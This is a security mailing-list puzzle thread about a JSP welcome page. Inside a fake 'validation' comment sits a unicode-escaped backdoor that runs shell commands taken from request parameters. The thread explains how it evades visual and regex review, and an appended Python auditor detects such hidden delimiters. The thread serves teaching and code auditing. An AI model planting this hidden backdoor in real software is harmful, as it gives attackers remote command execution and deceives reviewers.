<div> </div>
<div>I said this one would draw more interest than the others...  :)) it didn't.</div>
<div> </div>
<div>The answer: a backdoor written with the logic &quot;everyone trusts the developers, but they can wreck production&quot;. Java allows code to be written with unicode characters in a specific format (\uxxxx). That is, identifiers, keywords, operators etc. do not all have to be ASCII. (C#, on the other hand, does have such a restriction: for keywords and operators, for example, only ASCII characters can be used.) In short, if you take the part written in unicode format inside the JSP I gave, put a &#39; character at its beginning and end, and then </div>

<div> </div>
<div><a href="http://www.webguvenligi.org/ipacker/ipacker.html">http://www.webguvenligi.org/ipacker/ipacker.html</a></div>
<div> </div>
<div>put it into the INPUT section of that application and press the EVAL TO OUTPUT button, you can see what kind of backdoor the developer actually wrote. The resulting piece closes the multiline comment section, writes the actual backdoor code, and then opens the multiline comment section again (so that we don&#39;t get a &quot;syntax error&quot;, just like with sqli, ldapi).</div>

<div> </div>
<div>This makes things harder for an auditor who is looking with the naked eye or trying to audit with regex.<br><br>bedirhan</div>
<div> </div>
<div class="gmail_quote">On 18 October 2009 at 21:05, Bedirhan Urgun <span dir="ltr">&lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;</span> wrote:<br>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">
<div> </div>
<div>This time there is a fun bug :) It requires looking at the problem from a different perspective. A JSP page...</div>
<div> </div>
<div>bedirhan</div>
<div> </div>
<div>Find the Bug #4</div>
<div>--------------------</div>
<div><br>&lt;<a href="mailto:%25@page" target="_blank">%@page</a> contentType=&quot;text/html&quot; pageEncoding=&quot;UTF-8&quot;%&gt;<br>&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;<br>   &quot;<a href="http://www.w3.org/TR/html4/loose.dtd" target="_blank">http://www.w3.org/TR/html4/loose.dtd</a>&quot;&gt;</div>

<div>&lt;html&gt;<br>    &lt;head&gt;<br>        &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;<br>        &lt;title&gt;BankHorizon Welcome Page&lt;/title&gt;<br>        &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;style.css&quot; /&gt;<br>
    &lt;/head&gt;<br>    &lt;body&gt;<br>        &lt;% /* Include the header page */ %&gt;<br>        &lt;jsp:include page=&quot;header.jsp&quot; /&gt;<br>        &lt;% /* Include the menu page */ %&gt;<br>        &lt;jsp:include page=&quot;menu.jsp&quot; /&gt;<br>
        &lt;% /* Include the footer menu left page */ %&gt;<br>        &lt;jsp:include page=&quot;footer_menu_left.jsp&quot; /&gt;<br>        &lt;h2&gt;&lt;/h2&gt;<br>        &lt;jsp:include page=&quot;data_validation.jsp&quot; /&gt;<br>
        &lt;%<br>            /************************************COMMENT BEGIN************************************** </div>
<div>           This is unicode that will be used for data validation<br>            \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a<br>
            *************************************COMMENT END***********************************/     <br>            String lang = request.getParameter(&quot;language&quot;);<br>            // use the unicode above to validate the data<br>
            validateUnicode(lang);                                <br>        %&gt;<br>        &lt;br/&gt;<br>        &lt;% /* Include the footer bottom page */ %&gt;<br>        &lt;jsp:include page=&quot;footer_bottom.jsp&quot; /&gt;<br>
    &lt;/body&gt;<br>&lt;/html&gt;<br></div></blockquote></div><br><br clear="all">
<div></div><br>-- <br>Bedirhan Urgun<br><a href="http://www.webguvenligi.org">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a><br><br>To subscribe to the Turkish Web Application Security mailing list: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>
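<div>An added example, not part of the thread and not the ipacker tool: a Python auditor that applies Java's \uXXXX translation the way javac does (JLS 3.3) and reports comment or string delimiters that exist only after translation, so a regex-based review is no longer fooled by the trick above. The JSP fragment in it is constructed for the example and reuses the same comment-closing technique; the function names are mine.</div>

```python
HEX = set('0123456789abcdefABCDEF')
DELIMITERS = ('*/', '/*', '//', '"', "'")

def translate_escapes(src):
    """Java's \\uXXXX translation (JLS 3.3), done by javac before lexing. Returns
    (translated text, chars produced by escapes). A backslash opens an escape only
    when preceded by an even number of backslashes; extra 'u's are allowed."""
    out, produced, i, n = [], [], 0, len(src)
    while i < n:
        if src[i] != '\\':
            out.append(src[i]); i += 1; continue
        j = i
        while j < n and src[j] == '\\':          # measure the run of backslashes
            j += 1
        if (j - i) % 2 == 0 or src[j:j + 1] != 'u':  # even run, or not \u: no escape
            out.append(src[i:j]); i = j; continue
        k = j
        while k < n and src[k] == 'u':           # \uuu002a is the same as \u002a
            k += 1
        hexpart = src[k:k + 4]
        if len(hexpart) < 4 or not set(hexpart) <= HEX:  # malformed; javac rejects it
            out.append(src[i:k]); i = k; continue
        ch = chr(int(hexpart, 16))
        out.append('\\' * (j - i - 1) + ch); produced.append(ch); i = k + 4
    return ''.join(out), produced

def audit(source):
    """Flag lines whose escapes decode to printable ASCII (never needed in real
    source) and name delimiters that exist only after translation, i.e. ones a
    regex over the raw file never sees."""
    findings = []
    for lineno, raw in enumerate(source.splitlines(), 1):
        decoded, produced = translate_escapes(raw)
        hidden = ''.join(c for c in produced if 0x20 <= ord(c) < 0x7f)
        new_delims = [d for d in DELIMITERS if decoded.count(d) > raw.count(d)]
        if hidden or new_delims:
            findings.append({'line': lineno, 'delimiters': new_delims, 'hidden': hidden})
    return findings

# Constructed sample in the style of the JSP in the thread: a "validation"
# comment that really closes the comment, runs a statement, and reopens it.
SAMPLE = r'''String lang = request.getParameter("language");
/* validation table
   \u002a\u002f\u0020\u006c\u0061\u006e\u0067\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u0020\u002f\u002a
*/
String label = "caf\u00e9";   // non-ASCII escape: legitimate use
String path = "C:\\u0041";    // escaped backslash before u: not an escape
'''
if __name__ == '__main__':
    print(audit(SAMPLE))
```

Only the third sample line is reported; the accented literal and the escaped backslash are left alone, which is what keeps the check usable on real code bases.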